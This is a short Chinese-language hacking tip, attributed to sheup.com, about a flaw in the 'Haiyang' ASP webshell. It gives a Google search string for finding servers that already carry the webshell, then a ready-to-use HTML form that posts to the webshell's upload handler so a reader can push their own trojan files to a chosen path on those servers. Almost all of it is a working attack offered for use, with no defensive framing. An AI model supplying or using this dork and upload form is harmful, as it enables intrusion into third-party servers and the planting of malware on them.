海阳ASP木马的漏洞
海阳asp木马的漏洞!
在Google搜索"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字,(::::海阳顶端网ASP木马XP.net版::::)也可以的哦!兴奋的在下面:新建文本文挡,将以下内容复制过去,另存为.htm文件,就可以把本地的木马文件上传到远程服务器上。注:后为注释
<form name="form1" method="post" action="http://xxx.xxx.xxx/xxx.asp?up=1";enctype="multipart/form-data"> http://xxx.xxx.xxx/xxx.asp就是搜索到的木马网址及文件名
<input type="hidden" name="act" value="upload">
传至服务器已有目录:
<input name="filepath" type="text" value="x:\xxx\xxx\"> x:\xxx\xxx\是http://xxx.xxx.xxx/xxx.asp木马执行显示的实际物理地址
文件:
<input type="file" name="file1" value="">
<input type="submit" name="Submit" value="上传">
绝对路径</form>
最新海阳木马修正版已经修改了此漏洞,此前的此种方法均有效.
(出处:http://www.sheup.com)